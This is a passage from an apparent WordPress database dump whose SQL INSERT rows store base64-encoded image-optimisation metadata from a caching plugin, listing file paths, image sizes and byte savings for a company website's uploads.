C8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS0xLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS0xLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS0xLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyOTE5LCJpZCI6MTgwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLTEtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLTEtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLTEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI5MjIsImlkIjoxODAyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtMS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLTEtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtMS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyOTI2LCJpZCI6MTgwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLTEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI5MjksImlkIjoxODAyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2MjkzMSwiaWQiOjE4MDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS0xLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS0xLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS0xLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyOTMzLCJpZCI6MTgwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLTEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLTEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI5MzYsImlkIjoxODAyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS0xLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS0xLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS0xLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyOTM4LCJpZCI6MTgwMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtMS0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtMS0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtMS0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2Mjk0MSwiaWQiOjE4MDJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLTEtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLTEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLTEtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI5NDQsImlkIjoxODAyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS0xLTQ1MHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS0xLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS0xLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyOTQ3LCJpZCI6MTgwMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtMS05MHg5MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLTEtOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtMS05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjUsInRpbWUiOjE0ODM1NjI5NTAsImlkIjoxODAyfV0='); 
INSERT INTO `wp_postmeta` VALUES (29160, 1799, 'wpfc_optimisation_reduction', '26522'); 
INSERT INTO `wp_postmeta` VALUES (29161, 1799, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODgtMi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg4LTIuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2Mjk1NSwiaWQiOiIxNzk5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04OC0yLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODgtMi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JFTEVBU1lTLTg4LTItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjkxNiwidGltZSI6MTQ4MzU2Mjk1OCwiaWQiOjE3OTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODgtMi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg4LTItODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SRUxFQVNZUy04OC0yLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjozMDQyLCJ0aW1lIjoxNDgzNTYyOTYyLCJpZCI6MTc5OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04OC0yLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODgtMi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JFTEVBU1lTLTg4LTItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI3NTQsInRpbWUiOjE0ODM1NjI5NjUsImlkIjoxNzk5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg4LTItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODgtMi0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODgtMi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMzIwOSwidGltZSI6MTQ4MzU2Mjk2OSwiaWQiOjE3OTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODgtMi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg4LTItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SRUxFQVNZUy04OC0yLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MTcsInRpbWUiOjE0ODM1NjI5NzIsImlkIjoxNzk5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg4LTItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04OC0yLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODgtMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTIxLCJ0aW1lIjoxNDgzNTYyOTc2LCJpZCI6MTc5OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04OC0yLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODgtMi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JFTEVBU1lTLTg4LTItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU4OSwidGltZSI6MTQ4MzU2Mjk3OSwiaWQiOjE3OTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODgtMi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg4LTItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SRUxFQVNZUy04OC0yLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxODIxLCJ0aW1lIjoxNDgzNTYyOTgyLCJpZCI6MTc5OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg4LTItMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04OC0yLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODgtMi0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDExLCJ0aW1lIjoxNDgzNTYyOTg2LCJpZCI6MTc5OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg4LTItMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04OC0yLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODgtMi0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NjA0LCJ0aW1lIjoxNDgzNTYyOTg5LCJpZCI6MTc5OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg4LTItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04OC0yLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODgtMi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjQzLCJ0aW1lIjoxNDgzNTYyOTkzLCJpZCI6MTc5OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg4LTItNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04OC0yLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODgtMi00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTAxMCwidGltZSI6MTQ4MzU2Mjk5NiwiaWQiOjE3OTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04OC0yLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg4LTItOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JFTEVBU1lTLTg4LTItOTB4OTAuanBnIiwicmVkdWN0aW9uIjozODUsInRpbWUiOjE0ODM1NjI5OTksImlkIjoxNzk5fV0='); 
INSERT INTO `wp_postmeta` VALUES (29162, 1798, 'wpfc_optimisation_reduction', '27005'); 
INSERT INTO `wp_postmeta` VALUES (29163, 1798, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODUtMi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg1LTIuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2MzAwNCwiaWQiOiIxNzk4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04NS0yLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODUtMi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfa